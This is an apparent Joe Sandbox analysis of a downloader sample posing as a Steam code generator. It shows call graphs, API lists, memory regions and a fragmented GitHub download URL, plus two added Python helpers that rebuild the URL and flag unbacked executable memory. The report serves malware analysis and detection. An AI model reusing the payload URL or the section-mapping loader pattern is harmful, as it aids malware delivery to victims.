19072->18996 19073->19072 19075 7ff6635499b2 memcpy_s _invalid_parameter_noinfo_noreturn 19074->19075 19076 7ff6635499d1 RtlCaptureContext RtlLookupFunctionEntry 19075->19076 19077 7ff6635499fa RtlVirtualUnwind 19076->19077 19078 
7ff663549a36 memcpy_s 19076->19078 19077->19078 19079 7ff663549a68 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 19078->19079 19080 7ff663549ab6 _invalid_parameter_noinfo_noreturn 19079->19080 19080->18994 19082 7ff663564864 19081->19082 19083 7ff6635490f6 19082->19083 19091 7ff66355a7f0 19082->19091 19083->19012 19085 7ff66354ae30 19083->19085 19086 7ff66354ae38 19085->19086 19087 7ff66354ae42 19085->19087 19103 7ff66354b008 19086->19103 19087->19012 19102 7ff663552104 EnterCriticalSection 19091->19102 19093 7ff66355a800 19094 7ff663561ce8 53 API calls 19093->19094 19095 7ff66355a809 19094->19095 19096 7ff66355a817 19095->19096 19097 7ff66355a5f8 55 API calls 19095->19097 19098 7ff663552158 Concurrency::details::SchedulerProxy::DeleteThis LeaveCriticalSection 19096->19098 19099 7ff66355a812 19097->19099 19100 7ff66355a823 19098->19100 19101 7ff66355a6e8 GetStdHandle GetFileType 19099->19101 19100->19082 19101->19096 19104 7ff66354b017 19103->19104 19105 7ff66354ae3d 19103->19105 19111 7ff66354e424 19104->19111 19107 7ff66354e254 19105->19107 19108 7ff66354e27f 19107->19108 19109 7ff66354e262 DeleteCriticalSection 19108->19109 19110 7ff66354e283 19108->19110 19109->19108 19110->19087 19115 7ff66354e28c 19111->19115 19116 7ff66354e376 TlsFree 19115->19116 19122 7ff66354e2d0 __vcrt_InitializeCriticalSectionEx 19115->19122 19117 7ff66354e2fe LoadLibraryExW 19119 7ff66354e39d 19117->19119 19120 7ff66354e31f GetLastError 19117->19120 19118 7ff66354e3bd GetProcAddress 19118->19116 19119->19118 19121 7ff66354e3b4 FreeLibrary 19119->19121 19120->19122 19121->19118 19122->19116 19122->19117 19122->19118 19123 7ff66354e341 LoadLibraryExW 19122->19123 19123->19119 19123->19122 19125 7ff663555ae5 19124->19125 19138 7ff663555ae1 19124->19138 19147 7ff663561270 19125->19147 19130 7ff663555af7 19132 7ff663558af4 __free_lconv_num 11 API calls 19130->19132 19131 7ff663555b03 19173 7ff663555b40 19131->19173 19132->19138 19135 7ff663558af4 __free_lconv_num 11 
API calls 19136 7ff663555b2a 19135->19136 19137 7ff663558af4 __free_lconv_num 11 API calls 19136->19137 19137->19138 19138->19022 19139 7ff663555c94 19138->19139 19140 7ff663555cbd 19139->19140 19145 7ff663555cd6 19139->19145 19140->19022 19141 7ff663558a7c _set_fmode 11 API calls 19141->19145 19142 7ff663555d66 19144 7ff663558af4 __free_lconv_num 11 API calls 19142->19144 19143 7ff66355fc34 WideCharToMultiByte std::_Locinfo::_Locinfo_ctor 19143->19145 19144->19140 19145->19140 19145->19141 19145->19142 19145->19143 19146 7ff663558af4 __free_lconv_num 11 API calls 19145->19146 19146->19145 19148 7ff66356127d 19147->19148 19149 7ff663555aea 19147->19149 19192 7ff66355a36c 19148->19192 19153 7ff663561634 GetEnvironmentStringsW 19149->19153 19154 7ff663555aef 19153->19154 19155 7ff663561664 19153->19155 19154->19130 19154->19131 19156 7ff66355fc34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19155->19156 19157 7ff6635616b5 19156->19157 19158 7ff6635616bc FreeEnvironmentStringsW 19157->19158 19159 7ff663558b30 std::_Locinfo::_Locinfo_ctor 12 API calls 19157->19159 19158->19154 19160 7ff6635616cf 19159->19160 19161 7ff6635616d7 19160->19161 19162 7ff6635616e0 19160->19162 19163 7ff663558af4 __free_lconv_num 11 API calls 19161->19163 19164 7ff66355fc34 std::_Locinfo::_Locinfo_ctor WideCharToMultiByte 19162->19164 19165 7ff6635616de 19163->19165 19166 7ff663561703 19164->19166 19165->19158 19167 7ff663561707 19166->19167 19168 7ff663561711 19166->19168 19169 7ff663558af4 __free_lconv_num 11 API calls 19167->19169 19170 7ff663558af4 __free_lconv_num 11 API calls 19168->19170 19171 7ff66356170f FreeEnvironmentStringsW 19169->19171 19170->19171 19171->19154 19174 7ff663555b65 19173->19174 19175 7ff663558a7c _set_fmode 11 API calls 19174->19175 19188 7ff663555b9b 19175->19188 19176 7ff663555ba3 19177 7ff663558af4 __free_lconv_num 11 API calls 19176->19177 19179 7ff663555b0b 19177->19179 19178 7ff663555c16 19180 7ff663558af4 __free_lconv_num 11 API calls 19178->19180 
19179->19135 19180->19179 19181 7ff663558a7c _set_fmode 11 API calls 19181->19188 19182 7ff663555c05 19410 7ff663555c50 19182->19410 19183 7ff663551b00 __std_exception_copy 47 API calls 19183->19188 19186 7ff663558af4 __free_lconv_num 11 API calls 19186->19176 19187 7ff663555c3b 19189 7ff663552074 _invalid_parameter_noinfo_noreturn 17 API calls 19187->19189 19188->19176 19188->19178 19188->19181 19188->19182 19188->19183 19188->19187 19190 7ff663558af4 __free_lconv_num 11 API calls 19188->19190 19191 7ff663555c4e 19189->19191 19190->19188 19193 7ff66355a37d FlsGetValue 19192->19193 19194 7ff66355a398 FlsSetValue 19192->19194 19195 7ff66355a38a 19193->19195 19196 7ff66355a392 19193->19196 19194->19195 19197 7ff66355a3a5 19194->19197 19198 7ff66355a390 19195->19198 19199 7ff663554e4c BuildCatchObjectHelperInternal 47 API calls 19195->19199 19196->19194 19200 7ff663558a7c _set_fmode 11 API calls 19197->19200 19212 7ff663560f48 19198->19212 19202 7ff66355a40d 19199->19202 19201 7ff66355a3b4 19200->19201 19203 7ff66355a3d2 FlsSetValue 19201->19203 19204 7ff66355a3c2 FlsSetValue 19201->19204 19206 7ff66355a3de FlsSetValue 19203->19206 19207 7ff66355a3f0 19203->19207 19205 7ff66355a3cb 19204->19205 19208 7ff663558af4 __free_lconv_num 11 API calls 19205->19208 19206->19205 19209 7ff66355a048 _set_fmode 11 API calls 19207->19209 19208->19195 19210 7ff66355a3f8 19209->19210 19211 7ff663558af4 __free_lconv_num 11 API calls 19210->19211 19211->19198 19235 7ff6635611b8 19212->19235 19214 7ff663560f7d 19250 7ff663560c48 19214->19250 19219 7ff663560fb3 19220 7ff663558af4 __free_lconv_num 11 API calls 19219->19220 19232 7ff663560f9a 19220->19232 19221 7ff663560fc2 19221->19221 19264 7ff6635612ec 19221->19264 19224 7ff6635610be 19225 7ff663554848 _set_fmode 11 API calls 19224->19225 19226 7ff6635610c3 19225->19226 19228 7ff663558af4 __free_lconv_num 11 API calls 19226->19228 19227 7ff663561119 19230 7ff663561180 19227->19230 19275 7ff663560a78 19227->19275 19228->19232 19229 
7ff6635610d8 19229->19227 19233 7ff663558af4 __free_lconv_num 11 API calls 19229->19233 19231 7ff663558af4 __free_lconv_num 11 API calls 19230->19231 19231->19232 19232->19149 19233->19227 19236 7ff6635611db 19235->19236 19237 7ff6635611e5 19236->19237 19290 7ff663552104 EnterCriticalSection 19236->19290 19239 7ff663561257 19237->19239 19242 7ff663554e4c BuildCatchObjectHelperInternal 47 API calls 19237->19242 19239->19214 19243 7ff66356126f 19242->19243 19245 7ff6635612c2 19243->19245 19247 7ff66355a36c 52 API calls 19243->19247 19245->19214 19248 7ff6635612ac 19247->19248 19249 7ff663560f48 67 API calls 19248->19249 19249->19245 19291 7ff663554868 19250->19291 19253 7ff663560c7a 19255 7ff663560c8f 19253->19255 19256 7ff663560c7f GetACP 19253->19256 19254 7ff663560c68 GetOEMCP 19254->19255 19255->19232 19257 7ff663558b30 19255->19257 19256->19255 19258 7ff663558b7b 19257->19258 19262 7ff663558b3f _set_fmode 19257->19262 19260 7ff663554848 _set_fmode 11 API calls 19258->19260 19259 7ff663558b62 HeapAlloc 19261 7ff663558b79 19259->19261 19259->19262 19260->19261 19261->19219 19261->19221 19262->19258 19262->19259 19263 7ff663555484 std::_Facet_Register 2 API calls 19262->19263 19263->19262 19265 7ff663560c48 49 API calls 19264->19265 19266 7ff663561319 19265->19266 19267 7ff663561356 IsValidCodePage 19266->19267 19273 7ff66356146f 19266->19273 19274 7ff663561370 memcpy_s 19266->19274 19269 7ff663561367 19267->19269 19267->19273 19268 7ff663548d90 _invalid_parameter_noinfo_noreturn 8 API calls 19270 7ff6635610b5 19268->19270 19271 7ff663561396 GetCPInfo 19269->19271 19269->19274 19270->19224 19270->19229 19271->19273 19271->19274 19273->19268 19323 7ff663560d60 19274->19323 19409 7ff663552104 EnterCriticalSection 19275->19409 19292 7ff66355488c 19291->19292 19293 7ff663554887 19291->19293 19292->19293 19294 7ff66355a298 _Getctype 47 API calls 19292->19294 19293->19253 19293->19254 19295 7ff6635548a7 19294->19295 19299 7ff663558b90 19295->19299 19300 7ff6635548ca 
19299->19300 19301 7ff663558ba5 19299->19301 19303 7ff663558bfc 19300->19303 19301->19300 19307 7ff663563264 19301->19307 19304 7ff663558c24 19303->19304 19305 7ff663558c11 19303->19305 19304->19293 19305->19304 19320 7ff6635612d0 19305->19320 19308 7ff66355a298 _Getctype 47 API calls 19307->19308 19309 7ff663563273 19308->19309 19310 7ff6635632be 19309->19310 19319 7ff663552104 EnterCriticalSection 19309->19319 19310->19300 19321 7ff66355a298 _Getctype 47 API calls 19320->19321 19322 7ff6635612d9 19321->19322 19324 7ff663560d9d GetCPInfo 19323->19324 19333 7ff663560e93 19323->19333 19330 7ff663560db0 19324->19330 19324->19333 19325 7ff663548d90 _invalid_parameter_noinfo_noreturn 8 API calls 19327 7ff663560f32 19325->19327 19327->19273 19334 7ff66355f1d0 19330->19334 19333->19325 19335 7ff663554868 TranslateName 47 API calls 19334->19335 19336 7ff66355f212 19335->19336 19354 7ff66355fba4 19336->19354 19356 7ff66355fbad MultiByteToWideChar 19354->19356 19411 7ff663555c55 19410->19411 19412 7ff663555c0d 19410->19412 19413 7ff663555c7e 19411->19413 19415 7ff663558af4 __free_lconv_num 11 API calls 19411->19415 19412->19186 19414 7ff663558af4 __free_lconv_num 11 API calls 19413->19414 19414->19412 19415->19411 19417 7ff663544ba1 19416->19417 19420 7ff663541350 19417->19420 19421 7ff663546688 49 API calls 19420->19421 19422 7ff663541360 19421->19422 19423 7ff66354a8d8 __std_exception_copy 47 API calls 19422->19423 19424 7ff663541399 19423->19424 19426 7ff66355a298 _Getctype 47 API calls 19425->19426 19427 7ff663558151 19426->19427 19428 7ff663554e4c BuildCatchObjectHelperInternal 47 API calls 19427->19428 19429 7ff663558171 19428->19429 19430 7ff663558b30 19431 7ff663558b7b 19430->19431 19435 7ff663558b3f _set_fmode 19430->19435 19433 7ff663554848 _set_fmode 11 API calls 19431->19433 19432 7ff663558b62 HeapAlloc 19434 7ff663558b79 19432->19434 19432->19435 19433->19434 19435->19431 19435->19432 19436 7ff663555484 std::_Facet_Register 2 API calls 19435->19436 19436->19435 
19437 22af4e179f8 VirtualAlloc 19438 22af4e17a10 19437->19438 19439 22af4e17a3c 19437->19439 19439->19438 19451 22af4e1943b 19439->19451 19441 22af4e1943b LoadLibraryA 19443 22af4e17b07 19441->19443 19442 22af4e17ab0 19442->19438 19442->19443 19480 22af4e191ab 19442->19480 19443->19438 19443->19441 19445 22af4e17b47 19443->19445 19445->19438 19450 22af4e17bbe 19445->19450 19484 22af4e168fb 19445->19484 19447 22af4e17ba5 19447->19438 19491 22af4e16a27 19447->19491 19450->19438 19455 22af4e1819f 19450->19455 19454 22af4e19472 19451->19454 19452 22af4e19497 19452->19442 19454->19452 19496 22af4e16f47 19454->19496 19456 22af4e181f3 19455->19456 19457 22af4e1824b NtCreateSection 19456->19457 19459 22af4e1827a 19456->19459 19479 22af4e18a27 19456->19479 19457->19459 19457->19479 19458 22af4e18320 NtMapViewOfSection 19469 22af4e18374 19458->19469 19459->19458 19459->19479 19460 22af4e186ef VirtualAlloc 19467 22af4e187a6 19460->19467 19462 22af4e191ab LoadLibraryA 19464 22af4e18650 19462->19464 19463 22af4e191ab LoadLibraryA 19463->19469 19464->19460 19464->19462 19472 22af4e19293 LoadLibraryA 19464->19472 19465 22af4e188a2 VirtualProtect 19466 22af4e189b5 VirtualProtect 19465->19466 19476 22af4e188ca 19465->19476 19473 22af4e189f1 19466->19473 19467->19465 19468 22af4e1881e NtUnmapViewOfSection 19467->19468 19471 22af4e18836 NtMapViewOfSection 19468->19471 19468->19479 19469->19463 19469->19464 19470 22af4e19293 LoadLibraryA 19469->19470 19469->19479 19470->19469 19471->19465 19471->19479 19472->19464 19473->19479 19510 22af4e18f4f 19473->19510 19474 22af4e189a8 19474->19466 19476->19474 19478 22af4e1897b VirtualProtect 19476->19478 19478->19476 19479->19438 19481 22af4e191c9 19480->19481 19482 22af4e19274 LoadLibraryA 19481->19482 19483 22af4e1927c 19481->19483 19482->19483 19483->19442 19485 22af4e191ab LoadLibraryA 19484->19485 19486 22af4e1691a 19485->19486 19487 22af4e19293 LoadLibraryA 19486->19487 19490 22af4e16922 19486->19490 19488 22af4e16941 19487->19488 19489 
22af4e19293 LoadLibraryA 19488->19489 19488->19490 19489->19490 19490->19447 19492 22af4e191ab LoadLibraryA 19491->19492 19493 22af4e16a45 19492->19493 19494 22af4e19293 LoadLibraryA 19493->19494 19495 22af4e16a5a 19494->19495 19495->19450 19497 22af4e1701e 19496->19497 19498 22af4e16f87 19496->19498 19497->19454 19498->19497 19500 22af4e170ff 19498->19500 19501 22af4e1716b 19500->19501 19505 22af4e17142 19500->19505 19502 22af4e191ab LoadLibraryA 19501->19502 19504 22af4e1717b 19501->19504 19502->19504 19504->19497 19505->19501 19505->19504 19506 22af4e19293 19505->19506 19507 22af4e19403 19506->19507 19508 22af4e192c9 19506->19508 19507->19505 19508->19507 19509 22af4e170ff LoadLibraryA 19508->19509 19509->19507 19513 22af4e18f8b 19510->19513 19511 22af4e19187 19511->19479 19512 22af4e19293 LoadLibraryA 19512->19513 19513->19511 19513->19512

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 7ff663542230-7ff663542413 call 7ff663544cf0 * 5 call 7ff663544a50 call 7ff663543b80 * 3 19 7ff663542447-7ff663542463 0->19 20 7ff663542415-7ff663542427 0->20 23 7ff663542497-7ff6635424b2 19->23 24 7ff663542465-7ff663542477 19->24 21 7ff663542429-7ff66354243c 20->21 22 7ff663542442 call 7ff663548db0 20->22 21->22 25 7ff663542756-7ff66354275b call 7ff663552044 21->25 22->19 29 7ff6635424e6-7ff66354252a SleepEx call 7ff663541f20 23->29 30 7ff6635424b4-7ff6635424c6 23->30 27 7ff663542479-7ff66354248c 24->27 28 7ff663542492 call 7ff663548db0 24->28 33 7ff66354275c-7ff663542761 call 7ff663552044 25->33 27->28 27->33 28->23 42 7ff66354252c-7ff66354254c VirtualAlloc 29->42 43 7ff663542571 29->43 35 7ff6635424c8-7ff6635424db 30->35 36 7ff6635424e1 call 7ff663548db0 30->36 40 7ff663542762-7ff663542767 call 7ff663552044 33->40 35->36 35->40 36->29 49 7ff663542768-7ff66354276d call 7ff663552044 40->49 42->43 46 7ff66354254e-7ff66354256f call 7ff6635695a0 VirtualFree 42->46 47 7ff663542577-7ff66354257a 43->47 46->47 51 7ff66354257c-7ff66354258d 47->51 52 7ff6635425b1-7ff6635425b9 47->52 65 7ff66354276e-7ff663542773 call 7ff663552044 49->65 57 7ff6635425a8-7ff6635425b0 call 7ff663548db0 51->57 58 7ff66354258f-7ff6635425a2 51->58 53 7ff6635425ec-7ff663542605 52->53 54 7ff6635425bb-7ff6635425cc 52->54 62 7ff663542639-7ff663542641 53->62 63 7ff663542607-7ff663542618 53->63 59 7ff6635425e7 call 7ff663548db0 54->59 60 7ff6635425ce-7ff6635425e1 54->60 57->52 58->49 58->57 59->53 60->59 60->65 70 7ff663542675-7ff66354267d 62->70 71 7ff663542643-7ff663542654 62->71 67 7ff66354261a-7ff66354262d 63->67 68 7ff663542633-7ff663542638 call 7ff663548db0 63->68 76 7ff663542774-7ff663542779 call 7ff663552044 65->76 67->68 67->76 68->62 73 7ff6635426b1-7ff6635426b9 70->73 74 7ff66354267f-7ff663542690 70->74 78 7ff663542656-7ff663542669 71->78 79 7ff66354266f-7ff663542674 call 7ff663548db0 71->79 83 
7ff6635426ed-7ff6635426f5 73->83 84 7ff6635426bb-7ff6635426cc 73->84 80 7ff6635426ab-7ff6635426b0 call 7ff663548db0 74->80 81 7ff663542692-7ff6635426a5 74->81 87 7ff66354277a-7ff66354277f call 7ff663552044 76->87 78->79 78->87 79->70 80->73 81->80 89 7ff663542780-7ff663542785 call 7ff663552044 81->89 95 7ff6635426f7-7ff663542708 83->95 96 7ff663542724-7ff66354274f call 7ff663548d90 83->96 91 7ff6635426e7-7ff6635426ec call 7ff663548db0 84->91 92 7ff6635426ce-7ff6635426e1 84->92 87->89 100 7ff663542786-7ff66354278b call 7ff663552044 89->100 91->83 92->91 92->100 104 7ff66354270a-7ff66354271d 95->104 105 7ff66354271f call 7ff663548db0 95->105 104->105 111 7ff663542750-7ff663542755 call 7ff663552044 104->111 105->96 111->25
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: _invalid_parameter_noinfo_noreturn$Virtual$AllocFreeSleep
                                                                        • String ID: Downloader$htt$nts/files/17267811/stm.txt$om/user-attachme$ps://gith$ub.c
                                                                        • API String ID: 1298506739-3644530041
                                                                        • Opcode ID: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                        • Instruction ID: abd27d062c9add0ec87308cba667c1db4d319a33626236ad97be4dc1336558be
                                                                        • Opcode Fuzzy Hash: ea04dfb8b05b74b2b0620327f61315c56e469aa5f16ef72dec762d63fb4ec1f1
                                                                        • Instruction Fuzzy Hash: 4BE19362E14B8685EB04DB75D4463AD2731EB957A4F109321EA5CABBEADF3CE4D0C340
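The Strings field of this function lists the download URL as out-of-order pieces ("htt", "ps://gith", "ub.c", "om/user-attachme", "nts/files/17267811/stm.txt") next to the literal "Downloader", a stacked-string layout that keeps the whole URL out of the binary's string table. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it takes exactly those fragments from the page and searches for the one ordering that forms a plausible URL. The fragment list is copied from the report; the recovered ordering, the plausibility rule (http(s) scheme, hostname with a common TLD, non-empty path) and the decision to leave the "Downloader" token out of the pool are this example's assumptions, not statements made by the report.

```python
"""Reassemble a URL stored as out-of-order string fragments.

Added example (not from the Joe Sandbox report or the sample). REPORT_FRAGMENTS
is copied from the report's Strings field for the function at 7ff663542230;
the ordering and the resulting URL are inferred here, not stated by the report.
"""
import re
from itertools import permutations
from urllib.parse import urlsplit

# Fragments exactly as the sandbox listed them (its order is not the in-memory
# order). The "Downloader" token from the same list is a plain string, not a
# URL piece, so it is deliberately left out of the pool (assumption).
REPORT_FRAGMENTS = [
    "htt",
    "nts/files/17267811/stm.txt",
    "om/user-attachme",
    "ps://gith",
    "ub.c",
]

# Plausibility rule (assumption): a hostname of dot-separated labels ending in
# a common TLD. Keeping the TLD list short rejects accidental joins such as
# "github.cnts" that a purely syntactic check would accept.
_HOST_RE = re.compile(
    r"^[a-z0-9-]+(\.[a-z0-9-]+)*\.(com|net|org|io|ru|cn|de|co|me|xyz|top)$"
)


def is_plausible_url(candidate: str) -> bool:
    """True if *candidate* has an http(s) scheme, an accepted host and a path."""
    parts = urlsplit(candidate)
    return (
        parts.scheme in ("http", "https")
        and bool(_HOST_RE.match(parts.netloc.lower()))
        and parts.path.startswith("/")
        and len(parts.path) > 1
    )


def reassemble(fragments):
    """Return every distinct ordering of *fragments* that joins into a plausible URL.

    Brute force is fine here: stacked-string URLs are rarely more than a handful
    of pieces, and the candidate set is the analyst's review list.
    """
    found = set()
    for order in permutations(fragments):
        joined = "".join(order)
        if joined not in found and is_plausible_url(joined):
            found.add(joined)
    return sorted(found)


def recovered_url():
    """The single recovered URL for the report's fragments, or None if ambiguous."""
    candidates = reassemble(REPORT_FRAGMENTS)
    return candidates[0] if len(candidates) == 1 else None


if __name__ == "__main__":
    for url in reassemble(REPORT_FRAGMENTS):
        print(url)
```

For these five pieces the search yields exactly one candidate, https://github.com/user-attachments/files/17267811/stm.txt, which matches the file name ("stm.txt") the fragments carry. The practical point for detection is that a YARA or string-match rule for the full URL would not fire on this binary; the SleepEx / VirtualAlloc / VirtualFree calls in the same function and the "user-attachments/files/" path fragment are the pieces that survive in the file.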
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: SectionVirtual$ProtectView$AllocCreateUnmap
                                                                        • String ID: @
                                                                        • API String ID: 1653215272-2766056989
                                                                        • Opcode ID: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                        • Instruction ID: a433a889392196f9f958826b5d23155d13bec697d6aa6df5d7f42730d65b7dec
                                                                        • Opcode Fuzzy Hash: 2ed318d2ea2cf2278bd42e912a4e74bd6f32db374bd63d65325d2cd2078d0a12
                                                                        • Instruction Fuzzy Hash: AE72DB30654B488BDB69DF68C8897EA73E1FB98304F14452DD98BC7641EF39E942CB42
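This record and the ones that follow for the 0000022AF4E10000 region are marked "based on PE: false", while the code at 00007FF663540000 is "based on PE: true": the sandbox is telling the reader which executable memory has a PE image behind it and which does not. The Python below is an added example, not part of the Joe Sandbox report: it decodes the three Memory Dump Source descriptors that appear on this page and flags executable regions that are not image-backed. The descriptor strings are copied from the page. The assumed field layout, pid.iteration.dumpid.base.protection.flags.type.index.sdmp, is this example's reading of the sandbox's naming scheme, not documented on the page; the PAGE_* and MEM_* constant values are the standard Win32 ones, and the sixth field is left undecoded because its meaning is not confirmed here.

```python
"""Decode Joe Sandbox memory-dump descriptors and flag unbacked executable memory.

Added example (not from the report). REPORT_REGIONS pairs each descriptor found
on this page with the report's own "based on PE" flag. The field layout assumed
below is an inference about the sandbox's naming scheme; only the Win32 PAGE_*
and MEM_* constant values are standard.
"""

# Standard Win32 page-protection constants (low byte of the protection value).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0x10 | 0x20 | 0x40 | 0x80

# Standard Win32 memory-type constants (MEMORY_BASIC_INFORMATION.Type).
MEM_TYPE = {0x1000000: "MEM_IMAGE", 0x40000: "MEM_MAPPED", 0x20000: "MEM_PRIVATE"}

# Descriptors copied from this page, paired with the page's "based on PE" flag.
REPORT_REGIONS = [
    ("00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp", True),
    ("00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp", False),
    ("00000000.00000002.3629964375.0000022AF4E51000.00000020.10000000.00040000.00000000.sdmp", False),
]


def parse_descriptor(name: str) -> dict:
    """Split a dump descriptor into the fields this example relies on.

    Assumed layout: pid.iteration.dumpid.base.protection.flags.type.index.sdmp
    Field 5 (flags) is intentionally not interpreted.
    """
    fields = name.split(".")
    if len(fields) != 9 or fields[-1] != "sdmp":
        raise ValueError(f"unexpected descriptor layout: {name}")
    protect = int(fields[4], 16)
    mem_type = int(fields[6], 16)
    return {
        "pid": int(fields[0], 16),
        "base": int(fields[3], 16),
        "protect": PAGE_PROTECT.get(protect & 0xFF, hex(protect)),
        "executable": bool(protect & EXECUTABLE_MASK),
        "type": MEM_TYPE.get(mem_type, hex(mem_type)),
    }


def classify(info: dict, based_on_pe: bool) -> str:
    """Label a region; executable memory without a PE image behind it is the signal."""
    if info["type"] == "MEM_IMAGE" and not based_on_pe:
        return "mismatch: MEM_IMAGE region not recognised as PE"
    if not info["executable"]:
        return "data"
    if info["type"] == "MEM_IMAGE":
        return "image-backed code"
    return f"unbacked executable memory ({info['protect']}, {info['type']})"


def triage(regions=REPORT_REGIONS) -> dict:
    """Map each region base (hex string) to its classification."""
    result = {}
    for descriptor, based_on_pe in regions:
        info = parse_descriptor(descriptor)
        result[hex(info["base"])] = classify(info, based_on_pe)
    return result


if __name__ == "__main__":
    for base, label in triage().items():
        print(f"{base}: {label}")
```

Applied to the page's own descriptors, the 00007FF663541000 region decodes as PAGE_EXECUTE_READ / MEM_IMAGE (the sample's mapped image), 0000022AF4E10000 as PAGE_EXECUTE_READWRITE / MEM_PRIVATE (writable-and-executable private memory with no file behind it, where the LoadLibraryA and CreateSection/MapView/Protect/Unmap routines below live), and 0000022AF4E51000 as PAGE_EXECUTE_READ / MEM_MAPPED (an executable section view, consistent with the section-mapping API pattern). Unbacked executable memory is the region to dump and scan first; the Yara matches the report attaches to 0000022AF4E10000 fit that.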

                                                                        Control-flow Graph

                                                                        Graph summary (node/edge listing of the rendered graph condensed): entry 22af4e191ab-22af4e191c7; loop 22af4e19232-22af4e19272 with a call to 22af4e19a17 from 22af4e1924c-22af4e19265; 22af4e19274-22af4e19279 calls LoadLibraryA; exits through 22af4e1927c-22af4e1928f.
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3629921626.0000022AF4E10000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000022AF4E10000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_22af4e10000_steamcodegenerator.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID: l
                                                                        • API String ID: 1029625771-2517025534
                                                                        • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                        • Instruction ID: 9c3b2ea1a96077160ca5fafe672257fffc19f3409ad6c5d2a1f707667483d415
                                                                        • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                                                                        • Instruction Fuzzy Hash: 4A310620558A854FE799DB2CD148B62BBD5FBA930CF2446ACC1CBC3953E728C446CB02

                                                                        Control-flow Graph

                                                                        Graph summary (node/edge listing of the rendered graph condensed): entry 7ff663546130-7ff66354615e, exit 7ff663546345-7ff663546352; the body calls only internal routines (7ff6635695a0 several times, 7ff663548db8, 7ff663548db0, 7ff663552044, 7ff663546370, 7ff6635412b0) and contains no Win32 API block.
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                        • String ID:
                                                                        • API String ID: 73155330-0
                                                                        • Opcode ID: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                        • Instruction ID: cf09f7baaa8963970c460b63ab47fbf886289850dcb43a33537244b6b0eb649c
                                                                        • Opcode Fuzzy Hash: c35681c349dced017d86a5f3adb7903ad82b0333e43f206d0047bf9162d83481
                                                                        • Instruction Fuzzy Hash: 41515562B19B86C5ED18DF22D5092BD6270AF55FD0F984232DE5DABB96DE3CE061C300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.3630042132.00007FF663541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF663540000, based on PE: true
                                                                        • Associated: 00000000.00000002.3630029312.00007FF663540000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630064658.00007FF66356B000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630081465.00007FF66357C000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.3630095510.00007FF66357F000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff663540000_steamcodegenerator.jbxd
                                                                        Similarity
                                                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                        • String ID:
                                                                        • API String ID: 1236291503-0
